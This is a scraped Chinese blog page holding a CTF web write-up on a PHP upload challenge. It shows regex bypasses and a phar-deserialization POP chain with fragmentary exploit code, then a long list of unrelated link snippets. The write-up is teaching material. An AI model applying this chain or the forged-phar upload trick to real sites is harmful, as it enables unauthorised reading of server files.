-Hopscotch
-Hopscotch

CTF - WEB - upload

简单浏览网页后发现给了一段php源码

通过 /base|class|file|function|index|upload_file/i 这个正则表达式提示网站有这些文件可以下载,接下来只需绕过正则

需要绕过的两个正则是相同的,经过一个未知函数过滤后使得第二次满足正则表达式,于是推测safe_replace($name)这个函数是起过滤特殊字符的作用

爆破之后成功下载到网页源码

浏览之后注意到这样一块代码

There is no file to show!
"; 
}
if(preg_match('/http|https|file:|gopher|dict|\.\/|\.\.|flag/i',$file)) {
            die('hacker!'); 
}elseif(!preg_match('/\//i',$file))
{
	die('hacker!');
}
$show = new Show(); 
if(file_exists($file)) { 
    $show->source = $file; 
    $show->_show(); 
} else if (!empty($file)){
    die('file doesn\'t exists.'); 
} 
?>

在网页没有对文件查询做限制的基础上,发现了file_exists($file)这个函数

在参数可控的情况下,配和phar://伪协议可以不依赖unserialize()函数进行反序列化操作

下面给出类的代码

source;
        $text = base64_encode(file_get_contents($text));
    }
    public function __toString()
    {
        $text= $this->source;
        $text = base64_encode(file_get_contents($text));
        return $text;
    }
    public function __set($key,$value)
    {
        $this->$key = $value;
    }
    public function _show()
    {
        if(preg_match('/http|https|file:|gopher|dict|\.\.|flag/i',$this->source)) {
            die('hacker!');
        } else {
            highlight_file($this->source);
        }
        
    }
    public function __wakeup()
    {
        if(preg_match("/http|https|file:|gopher|dict|\.\./i", $this->source)) {
            echo "hacker~";
            $this->source = "index.php";
        }
    }
}
class S6ow
{
    public $file;
    public $params;
    public function __construct()
    {
        $this->params = array();
    }
    public function __get($key)
    {
        return $this->params[$key];
    }
    public function __call($name, $arguments)
    {
        if($this->{$name})
            $this->{$this->{$name}}($arguments);
    }
    public function file_get($value)
    {
        var_dump($this->file);
        echo $this->file;
    }
}

class Sh0w
{
    public $test;
    public $str;
    public function __construct($name)
    {
        $this->str = new Show('index.php');
        $this->str->source = $this->test;

    }
    public function __destruct()
    {
        $this->str->_show();
    }
}

__construct()//构造函数,创建一个对象前进行调用
__toString()//将对象作为字符串使用时调用,多数在直接echo对象时调用
__set($key,$value)//给对象属性赋值前进行调用,若对象属性不存在,$key为对象属性,$value为对应的值
__wakeup()//将对象反序列化前进行调用
__sleep()//将对象序列化前调用
__get($key)//输出对象前调用,若对象属性不存在,$key为对象属性
__call($key,$value)//调用一个该类中不存在的方法时进行调用,$key为不存在的方法名,$value以数组形式储存了调用过所有不存在的方法名
__destruct()//析构函数,销毁一个对象后进行调用

以上是各个魔术方法的触发条件

通过阅读发现__wakeup()虽然是一个突破口但是只能拿到index.php的源码,并没有什么作用,于是选择__destruct()作为突破口

类Show中对_show函数做了严格的过滤,无法直接拿到flag,发现file_get函数也可以对内容进行输出,并且参数file可控,从而想办法调用file_get()

在类S6ow中发现__call方法,在仔细查看后发现可以通过__get方法从而执行任意函数接着最后是怎么输出flag的问题,__toString()方法在将对象作为字符串使用时调用,从而完美的解决了问题

接着是进行构造

source = 'flag.txt';
$a ->params = array('_show' => 'file_get');
$a ->file = $b;
$c ->str = $a;
?>

然后将其按以下格式写成一个phar文件

startBuffering();
    $phar->setStub(""); //设置stub,可以通过修改文件头伪造成其他格式的文件
    $o = new TestObject();
    $phar->setMetadata($o); //将自定义的meta-data存入manifest,进行序列化
    $phar->addFromString("test.txt", "test"); //添加要压缩的文件
    //签名自动计算
    $phar->stopBuffering();
?>

由于php是根据__HALT_COMPILER();?>来识别是否为phar文件的,于是可以修改文件头伪造成其他格式的文件从而绕过上传限制

上传后通过phar://伪协议+文件路径进行查看,即可拿到flag

 

你可能感兴趣的:(NYIST)

  • 每日一句英文 万幸得以相识
    "Wearetiredofchatting.Neverperfunctory,neverneglectful."These16wordssumupthemostenjoyablerelationships,whetherfriendshiporlove.Althoughwealwayssaythatcompanyisthelongestconfessionoflove,buttherealgood
  • Android Studio代理 江渚清沨 androidandroid-studio
    androidstudio镜像代理1、南阳理工学院镜像服务器地址:mirror.nyist.edu.cn端口:802、中国科学院开源协会镜像站地址:IPV4/IPV6:mirrors.opencas.cn端口:80IPV4/IPV6:mirrors.opencas.org端口:80IPV4/IPV6:mirrors.opencas.ac.cn端口:803、上海GDG镜像服务器地址:sdk.gdgs
  • 清华英语0a unit 1 尘妈陪娃
    第一篇~Looktherearetwocards/picturesCanyoutallmewhat'sthisBunnyandbear比大小,认知,数数It'sabunny(what'sthebunny,bunnyisthebabyrabbit)thisisthebabybunny,thisisthemummyrabbit,whichoneisbigorsmall,thisoneisxxxx,ye
  • 2021-04-19 商务英语公司制度改革的那些事儿(1) siya
    工厂工作必然会聊到工作流程,投资机器和生产销售以及内部制度1churningoutahugerangeofgoods生产大量商品churnout大量生产,快速生产ahugerangeof大范围的,许多各种不同的ahugeamountofrubbish/money/food大量的2it'sthetideofhighturnoverthattheycompanyistryingtostemwithth
  • SSAT考试类比题型解析 科林森国际教育
    SSAT考试中的类比题型同学们是否了解呢?今天小编通过一些题目来给大家详细介绍一下!下面赶快和小编一起来看一下吧!请大家先看下面一道ssat类比题(摘自SSAT官方指南):Melonistofelonas(A)mangleistotangle(B)bunnyistofunny(C)honeydewistorobber(D)cringeistofringe(E)mangoistotango这是一道非
  • “知识经济”直击会展行业:干货为上的全民学习时代 市场人卷娜
    带尬猴,我是卷娜。近年来伴随着互联网知识平台的风行,媒体、内容、教育的边界被打破。新型媒体、自媒体凭借其开放、社群化的特性大放异彩。↑智东西:GTIC高度信息化促使媒体打通线上线下,与潜在观众、读者建立多界面、多形式的联系。而不少媒体选择了峰会、会带展、课程、工作坊等活动作为突破口。首期【社会人】关键词:知识经济BrainyistheNewEconomy。知识经济通俗地说就是“以知识为基础的经济“
  • 西藏记忆(20)玛尼堆 星悦蔷薇
    文/星悦蔷薇玛尼石(MarnyiStone)最原始的名字是"玛智石"。这是根据三世如来心咒八字真言"嗡.玛智牟耶萨列德",取了前面的"玛智"两个字而来的。"玛智石"是从古象雄时代所留传下来的传统习俗。现代藏族同胞许许多多的习俗和生活方式,比如婚丧嫁娶、天文历算、医学文学、歌舞绘画、出行选宅、则选吉日、驱灾除邪、卜算占卦等等,在某种程度上也仍沿袭着古老雍仲本教的传统。藏族同胞还有许多独特的祈福方式:
  • 深入理解设计原则之单一职责原则(SRP)【软件架构设计】 Allen.Su 系统架构设计单一职责原则c++软件架构设计
    系列文章目录C++高性能优化编程系列深入理解软件架构设计系列深入理解设计模式系列高级C++并发线程编程命运是弱者失败的借口,是强者乐此不疲的必修课。Destinyistheweak'sexcuseforfailure,isrequiredforallthestrongenthusiasm.SRP:单一职责原则系列文章目录1、单一职责原则的定义和解读2、单一职责原则案例解读2.1、违背单一职责原则反
  • Sway Nana酱_
    Peopleareoftenswayedbyadvertisementsandbuylot’softhingstheydonotnecessarilyneed.Peopletendtobeswayedbycommercialsandpurchaselot’softhingsthatareunnecessary.场景:每个公司都在试图影响潜在消费者的想法造句:Everycompanyistrying
  • 2020-04-22 Blinda1998
    【盘面分析】A大盘趋势:关注北向资金的流向;下午开盘之后才开始选择上升方向,转危为安【交易心态】小赚小亏,偶尔大赚,杜绝大亏!【今日学习】Insurancecompany:PEVTheembeddedvalue(EV)ofalifeinsurancecompanyisthepresentvalueoffutureprofitsplusadjustednetassetvalue.期货知识:交割日交割
  • 【有生之年不得不听的1001张唱片】0006 | Duke Ellington | Ellington At Newport1956 (1956) kiss_the_rain86 1001张唱片音乐
    Afteraspellinthedoldrumswhenswingbandswentoutoffashion,DukeEllington’sperformanceattheNewportJazzFestivalonJuly7,1956,heraldedadramaticresurgenceinhispopularity.TheironyisthattherecordrushedoutbyColum
  • NYIST(计科ACM&TC)第三次招新赛题解 霾まる 招新赛算法c++
    A题原文,原比赛B题牛客练习赛104【出题人题解】-知乎直接输出输入的数就可以了B题C题找到分别处理"无留陀的化身"坐标轴的x轴和y轴,组合成无留陀的坐标,再遍历求纳西妲的坐标,相减即可/*⣿⣿⣿⣿⣿⣿⡷⣯⢿⣿⣷⣻⢯⣿⡽⣻⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣇⠸⣿⣿⣆⠹⣿⣿⢾⣟⣯⣿⣿⣿⣿⣿⣿⣽⣻⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣻⣽⡿⣿⣎⠙⣿⣞⣷⡌⢻⣟⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣿⣿⣿⣿⣿⣿⡄⠹⣿⣿⡆⠻⣿⣟
  • 查理·芒格——Brainy is the new Sexy 福琴生活记
    群里一起读书的小伙伴儿说:自从阅读了《穷查理宝典》,查理·芒格先生就成为了我的男神,彭于晏什么的都没有兴趣了,毕竟Brainyisthenewsexy。瞧,在智慧的战场上,年届95岁的芒格取得了胜利。查理·芒格是闻名于世的著名投资者沃伦·巴菲特的合作伙伴,相较于巴菲特,查理·芒格更低调一些。《穷查理宝典》收录了查理·芒格过去20年来的谈话稿及演讲稿,这些稿件中折射出的查理,博学、专注、耐心、理性,
  • 【菜菜的CV进阶之路 - 深度学习环境搭建】常用命令和配置指南 凤⭐尘 菜菜的进阶之路#深度学习环境搭建深度学习人工智能常用命令
    九、PyCharm+Docker:打造最舒适的深度学习炼丹炉安装docker:如何在Ubuntu22.04LTS中安装Docker和DockerComposehttps://zhuanlan.zhihu.com/p/547169542修改Linux硬盘卷标:ntfs文件系统:https://blog.csdn.net/nyist_yangguang/article/details/10995848
  • 同一个虚拟环境下的conda list和pip list里的包不一样,这是为什么,它们有什么区别 程序猿的探索之路 深度学习&机器学习Linux技术浅谈python心得
    区别:Conda除了虚拟环境下的还有关联文件下的Pip只有当前虚拟环境下的当关联环境下有这个包,再用conda在其他虚拟环境下下载该包就会直接关联不用下载比如说base环境下有包,在另一个环境下下载同样的包,就会关联上,不用真的下载,直接复制过去或者关联即可验证得到:pip下的list是conda下list的子集相关知识:https://blog.csdn.net/nyist_yangguang/
  • 稀里糊涂的解决了 cuda 和cudnn的安装以及conda安装pytorch出现的torch.cuda.is_available()为false的问题 程序猿的探索之路 Linux技术浅谈
    参考的链接:https://blog.csdn.net/ashome123/article/details/105822040#commentBoxUbuntu20.04CUDA&cuDNN安装方法https://blog.csdn.net/nyist_yangguang/article/details/109825256linux安装pytorch出现torch.cuda.is_availabl
  • A+B Problem IV 大实数加法 阿豪boy printf数学建模docker程序设计bug
    原文链接:A+BProblemIV大实数加法上一篇:A-BProblem大数相等下一篇:求高精度幂(未完成)A+BProblemIVhttp://acm.nyist.net/JudgeOnline/problem.php?pid=513时间限制:1000ms|内存限制:65535KB难度:3输入包含多组测试数据每组数据包含两个正数A,B(可能为小数且位数不大于400)输出每组输出数据占一行,输出A
  • 极限挑战火了,可他究竟是个什么运动? while666
    惠旅智能Brainyisthenewsexy随着《奔跑吧,兄弟》、《极限挑战》等户外体验明星秀节目的热播,越来越多的人渴望也有机会参与到类似的项目中来;城市定向活动以其独有的魅力已经在我国多个城市启动传播。那么定向运动究竟是什么?小编给你解密定向运动究竟怎么玩。全文字数:1467阅读时间:5分钟什么是定向运动?定向运动(Orienteering)概略的说,就是在地图(详细精确地图,如军事地图)和指
  • odoo excel报表开发总结 可笑_673c
    首先定义菜单然后是菜单动作然后初始化一个报表动作StockOutVoucherReportkthrp.chanyi.stock.out.voucher.reportformformnewChanyiStockOutVoucherReportkthrp.chanyi.stock.out.voucher.reportir.actions.report.xmlkthrp.chanyi.stock.out
  • 财富与幸福真的有关系吗 春喜外语
    So,isitthatwehavebeenthinkinginthewrongwayallalong?所以,是不是我们一直以来思考问题的方向都错了呢?Don’tcaretoomuchaboutmoney,becausemoneycanonlyinterferewithyourpursuitofhappiness.Theironyisthatpeoplethinktheywillbehappywhe
  • 独木舟上的旅行 Gitfan
    http://acm.nyist.net/JudgeOnline/problem.php?pid=71#include#include#include#include#includeusingnamespacestd;intmain(){intt;scanf("%d",&t);intarr[310];while(t--){intn,val,temp;scanf("%d%d",&val,&n);fo
  • #3#0605 莉莉安lee_1dab
    字词:1.ButthethingthatbugsmethemostaboutMannyisthenicknamehehasforit.bugs:原意是指虫子,小毛病和小故障,在电脑系统或者程序中,隐藏的缺陷或漏洞问题,就是bugs。这里是指v.让人厌烦的。Thatbugsmethemostaboutneighberisdecoratingtheirhouseallday.2.I'llbetIcou
  • 经济学人-Trading blows-7 不会聪明
    Ifthishappens,free-traderswillsurelygrumblethatMrTrumphasagainchosencommercialconflictoverco-operation.Buttheironyisthatbehindcloseddoors,hisofficialshadbeenactingconstructivelyinthemultilateraltalksa
  • 实用的编程网站—良好的开端 ア灬格子衬衫々 生活编程语言算法
    文章目录在线编程网站编程资源网编程源码网编程学习网在线编程网站nyist_acm领扣力扣洛谷计蒜客牛客网蓝桥杯ACM在线HUSTOJLiberOJEduCoderPIPIOJ编程资源网搜云盘最新资源收录列表IT视频学习网798资源网Java知识分享网编程源码网码农网最代码CTOLib编程学习网算法开放博客码农网码农教程CosChina脚本之家掘金编程字典易百教程路饭网驰狼课堂慕课网网易云课堂中国m
  • NYIST_ACM工作室寒假周赛1题解 hesorchen 题解
    这篇题解是赛前写的(最后一题是后来加的不算……),预测rk1AK,四题五人以内,半数以上人员一两题及以下……每个人都应该具有的水准为四题。第五题素数筛只提到过,还没讲过,但不是很难,希望大家能够赛后自学。第六题初次写的话思维和代码能力要求较大。A.CodeForces-1A一个长为n,宽为m的广场,至少用多少块边长为a的长方形瓷砖能将广场完全覆盖。5*5的广场用边长为2的瓷砖覆盖需要9块。AC代码
  • 云服务器上青岛oj的安装 nuoyanli #招新#Ubuntu#虚拟机oj
    这是我搭建好的oj:NYIST_ACM_OJ获取root权限sudopasswdroot#然后输入密码suroot更换源sudocp/etc/apt/sources.list/etc/apt/sources.list.bak#备份源文件sudovim/etc/apt/sources.list#将里面的内容随便用下面一个代替##163的加速源debhttp://mirrors.163.com/ubu
  • 中缀式变后缀式&&http://acm.nyist.net/JudgeOnline/problem.php?pid=467 iteye_20785
    描述人们的日常习惯是把算术表达式写成中缀式,但对于机器来说更“习惯于”后缀式,关于算术表达式的中缀式和后缀式的论述一般的数据结构书都有相关内容可供参看,这里不再赘述,现在你的任务是将中缀式变为后缀式。输入第一行输入一个整数n,共有n组测试数据(n#include#include#includeusingnamespacestd;stackfu;intran(chara){if(a=='#')ret
  • linux下Samba服务配置与安装 qingchn
    一,RPM包安装samba服务器、==================================================[root@nyist3root]#mount/mnt/cdrom[root@nyist3root]#cd/mnt/cdrom/RedHat/RPMS[root@nyist3RPMS]#rpm-ivhsamba-csamba-client-2.2.7a-7.9.0.
  • nyist --ACM组队练习赛(链接) weixin_33711647
    组队练习赛(一):http://acm.hust.edu.cn/vjudge/contest/view.action?cid=44219#overview解题报告:http://blog.csdn.net/u011026037/article/details/23997843组队练习赛(二):http://acm.nyist.net/JudgeOnline/problemset.php?cid=1
  • nyist---组队赛(五) 风儿--zsj 组队赛
    不得不说还是这么菜,只做了一个题,而且还是打表出来的,最近发现自己越来越浮躁了,真心不想写解题报告了;比赛题目链接:hust.acm[nyist]A题:http://blog.csdn.net/lyhvoyage/article/details/24440127B题:http://paste.ubuntu.com/7326620/D题:http://paste.ubuntu.com/7322932
  • TOMCAT在POST方法提交参数丢失问题 357029540 javatomcatjsp
    摘自http://my.oschina.net/luckyi/blog/213209 昨天在解决一个BUG时发现一个奇怪的问题,一个AJAX提交数据在之前都是木有问题的,突然提交出错影响其他处理流程。 检查时发现页面处理数据较多,起初以为是提交顺序不正确修改后发现不是由此问题引起。于是删除掉一部分数据进行提交,较少数据能够提交成功。 恢复较多数据后跟踪提交FORM DATA ,发现数
  • 在MyEclipse中增加JSP模板 删除-2008-08-18 ljy325 jspxmlMyEclipse
    在D:\Program Files\MyEclipse 6.0\myeclipse\eclipse\plugins\com.genuitec.eclipse.wizards_6.0.1.zmyeclipse601200710\templates\jsp  目录下找到Jsp.vtl,复制一份,重命名为jsp2.vtl,然后把里面的内容修改为自己想要的格式,保存。 然后在 D:\Progr
  • JavaScript常用验证脚本总结 eksliang JavaScriptjavaScript表单验证
         转载请出自出处:http://eksliang.iteye.com/blog/2098985        下面这些验证脚本,是我在这几年开发中的总结,今天把他放出来,也算是一种分享吧,现在在我的项目中也在用!包括日期验证、比较,非空验证、身份证验证、数值验证、Email验证、电话验证等等...! &nb
  • 微软BI(4) 18289753290 微软BI SSIS
    1) Q:查看ssis里面某个控件输出的结果:  A MessageBox.Show(Dts.Variables["v_lastTimestamp"].Value.ToString()); 这是我们在包里面定义的变量 2):在关联目的端表的时候如果是一对多的关系,一定要选择唯一的那个键作为关联字段。 3) Q:ssis里面如果将多个数据源的数据插入目的端一
  • 定时对大数据量的表进行分表对数据备份 酷的飞上天空 大数据量
    工作中遇到数据库中一个表的数据量比较大,属于日志表。正常情况下是不会有查询操作的,但如果不进行分表数据太多,执行一条简单sql语句要等好几分钟。。   分表工具:linux的shell + mysql自身提供的管理命令 原理:使用一个和原表数据结构一样的表,替换原表。   linux shell内容如下: =======================开始 
  • 本质的描述与因材施教 永夜-极光 感想随笔
             不管碰到什么事,我都下意识的想去探索本质,找寻一个最形象的描述方式。        我坚信,世界上对一件事物的描述和解释,肯定有一种最形象,最贴近本质,最容易让人理解        &
  • 很迷茫。。。 随便小屋 随笔
    小弟我今年研一,也是从事的咱们现在最流行的专业(计算机)。本科三流学校,为了能有个更好的跳板,进入了考研大军,非常有幸能进入研究生的行业(具体学校就不说了,怕把学校的名誉给损了)。   先说一下自身的条件,本科专业软件工程。主要学习就是软件开发,几乎和计算机没有什么区别。因为学校本身三流,也就是让老师带着学生学点东西,然后让学生毕业就行了。对专业性的东西了解的非常浅。就那学的语言来说
  • 23种设计模式的意图和适用范围 aijuans 设计模式
    Factory Method 意图 定义一个用于创建对象的接口,让子类决定实例化哪一个类。Factory Method 使一个类的实例化延迟到其子类。   适用性 当一个类不知道它所必须创建的对象的类的时候。   当一个类希望由它的子类来指定它所创建的对象的时候。   当类将创建对象的职责委托给多个帮助子类中的某一个,并且你希望将哪一个帮助子类是代理者这一信息局部化的时候。 Abstr
  • Java中的synchronized和volatile aoyouzi javavolatilesynchronized
    说到Java的线程同步问题肯定要说到两个关键字synchronized和volatile。说到这两个关键字,又要说道JVM的内存模型。JVM里内存分为main memory和working memory。 Main memory是所有线程共享的,working memory则是线程的工作内存,它保存有部分main memory变量的拷贝,对这些变量的更新直接发生在working memo
  • js数组的操作和this关键字 百合不是茶 js数组操作this关键字
    js数组的操作;   一:数组的创建: 1、数组的创建 var array = new Array(); //创建一个数组 var array = new Array([size]); //创建一个数组并指定长度,注意不是上限,是长度 var arrayObj = new Array([element0[, element1[, ...[, elementN]]]
  • 别人的阿里面试感悟 bijian1013 面试分享工作感悟阿里面试
    原文如下:http://greemranqq.iteye.com/blog/2007170         一直做企业系统,虽然也自己一直学习技术,但是感觉还是有所欠缺,准备花几个月的时间,把互联网的东西,以及一些基础更加的深入透析,结果这次比较意外,有点突然,下面分享一下感受吧!    &nb
  • 淘宝的测试框架Itest Bill_chen springmaven框架单元测试JUnit
    Itest测试框架是TaoBao测试部门开发的一套单元测试框架,以Junit4为核心, 集合DbUnit、Unitils等主流测试框架,应该算是比较好用的了。 近期项目中用了下,有关itest的具体使用如下: 1.在Maven中引入itest框架: <dependency>   <groupId>com.taobao.test</groupId&g
  • 【Java多线程二】多路条件解决生产者消费者问题 bit1129 java多线程
    package com.tom; import java.util.LinkedList; import java.util.Queue; import java.util.concurrent.ThreadLocalRandom; import java.util.concurrent.locks.Condition; import java.util.concurrent.loc
  • 汉字转拼音pinyin4j 白糖_ pinyin4j
    以前在项目中遇到汉字转拼音的情况,于是在网上找到了pinyin4j这个工具包,非常有用,别的不说了,直接下代码:   import java.util.HashSet; import java.util.Set; import net.sourceforge.pinyin4j.PinyinHelper; import net.sourceforge.pinyin
  • org.hibernate.TransactionException: JDBC begin failed解决方案 bozch ssh数据库异常DBCP
    org.hibernate.TransactionException: JDBC begin failed:     at org.hibernate.transaction.JDBCTransaction.begin(JDBCTransaction.java:68)    at org.hibernate.impl.SessionImp
  • java-并查集(Disjoint-set)-将多个集合合并成没有交集的集合 bylijinnan java
    import java.util.ArrayList; import java.util.Arrays; import java.util.HashMap; import java.util.HashSet; import java.util.Iterator; import java.util.List; import java.util.Map; import java.ut
  • Java PrintWriter打印乱码 chenbowen00 java
    一个小程序读写文件,发现PrintWriter输出后文件存在乱码,解决办法主要统一输入输出流编码格式。 读文件: BufferedReader 从字符输入流中读取文本,缓冲各个字符,从而提供字符、数组和行的高效读取。 可以指定缓冲区的大小,或者可使用默认的大小。大多数情况下,默认值就足够大了。 通常,Reader 所作的每个读取请求都会导致对基础字符或字节流进行相应的读取请求。因
  • [天气与气候]极端气候环境 comsci 环境
          如果空间环境出现异变...外星文明并未出现,而只是用某种气象武器对地球的气候系统进行攻击,并挑唆地球国家间的战争,经过一段时间的准备...最大限度的削弱地球文明的整体力量,然后再进行入侵......      那么地球上的国家应该做什么样的防备工作呢?  &n
  • oracle order by与union一起使用的用法 daizj UNIONoracleorder by
    当使用union操作时,排序语句必须放在最后面才正确,如下: 只能在union的最后一个子查询中使用order by,而这个order by是针对整个unioning后的结果集的。So: 如果unoin的几个子查询列名不同,如 Sql代码  select supplier_id, supplier_name  from suppliers  UNI
  • zeus持久层读写分离单元测试 deng520159 单元测试
    本文是zeus读写分离单元测试,距离分库分表,只有一步了.上代码: 1.ZeusMasterSlaveTest.java package com.dengliang.zeus.webdemo.test; import java.util.ArrayList; import java.util.List; import org.junit.Assert; import org.j
  • Yii 截取字符串(UTF-8) 使用组件 dcj3sjt126com yii
    1.将Helper.php放进protected\components文件夹下。 2.调用方法:   Helper::truncate_utf8_string($content,20,false);   //不显示省略号  Helper::truncate_utf8_string($content,20);  //显示省略号  &n
  • 安装memcache及php扩展 dcj3sjt126com PHP
    安装memcache    tar zxvf memcache-2.2.5.tgz     cd memcache-2.2.5/     /usr/local/php/bin/phpize (?)    ./configure --with-php-confi
  • JsonObject 处理日期 feifeilinlin521 javajsonJsonOjbectJsonArrayJSONException
        写这边文章的初衷就是遇到了json在转换日期格式出现了异常 net.sf.json.JSONException: java.lang.reflect.InvocationTargetException  原因是当你用Map接收数据库返回了java.sql.Date 日期的数据进行json转换出的问题话不多说  直接上代码  &n
  • Ehcache(06)——监听器 234390216 监听器listenerehcache
    监听器          Ehcache中监听器有两种,监听CacheManager的CacheManagerEventListener和监听Cache的CacheEventListener。在Ehcache中,Listener是通过对应的监听器工厂来生产和发生作用的。下面我们将来介绍一下这两种类型的监听器。  
  • activiti 自带设计器中chrome 34版本不能打开bug的解决 jackyrong Activiti
      在acitivti modeler中,如果是chrome 34,则不能打开该设计器,其他浏览器可以, 经证实为bug,参考 http://forums.activiti.org/content/activiti-modeler-doesnt-work-chrome-v34 修改为,找到 oryx.debug.js 在最头部增加 if (!Document.
  • 微信收货地址共享接口-终极解决 laotu5i0 微信开发
       最近要接入微信的收货地址共享接口,总是不成功,折腾了好几天,实在没办法网上搜到的帖子也是骂声一片。我把我碰到并解决问题的过程分享出来,希望能给微信的接口文档起到一个辅助作用,让后面进来的开发者能快速的接入,而不需要像我们一样苦逼的浪费好几天,甚至一周的青春。各种羞辱、谩骂的话就不说了,本人还算文明。    如果你能搜到本贴,说明你已经碰到了各种 ed
  • 关于人才 netkiller.github.com 工作面试招聘netkiller人才
    关于人才 每个月我都会接到许多猎头的电话,有些猎头比较专业,但绝大多数在我看来与猎头二字还是有很大差距的。 与猎头接触多了,自然也了解了他们的工作,包括操作手法,总体上国内的猎头行业还处在初级阶段。 总结就是“盲目推荐,以量取胜”。 目前现状 许多从事人力资源工作的人,根本不懂得怎么找人才。处在人才找不到企业,企业找不到人才的尴尬处境。 企业招聘,通常是需要用人的部门提出招聘条件,由人
  • 搭建 CentOS 6 服务器 - 目录 rensanning centos
    (1) 安装CentOS ISO(desktop/minimal)、Cloud(AWS/阿里云)、Virtualization(VMWare、VirtualBox) 详细内容 (2) Linux常用命令 cd、ls、rm、chmod...... 详细内容 (3) 初始环境设置 用户管理、网络设置、安全设置...... 详细内容 (4) 常驻服务Daemon
  • 【求助】mongoDB无法更新主键 toknowme mongodb
      Query query = new Query();          query.addCriteria(new Criteria("_id").is(o.getId()));                &n
  • jquery 页面滚动到底部自动加载插件集合 xp9802 jquery
    很多社交网站都使用无限滚动的翻页技术来提高用户体验,当你页面滑到列表底部时候无需点击就自动加载更多的内容。下面为你推荐 10 个 jQuery 的无限滚动的插件: 1. jQuery ScrollPagination jQuery ScrollPagination plugin 是一个 jQuery 实现的支持无限滚动加载数据的插件。 2. jQuery Screw S
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他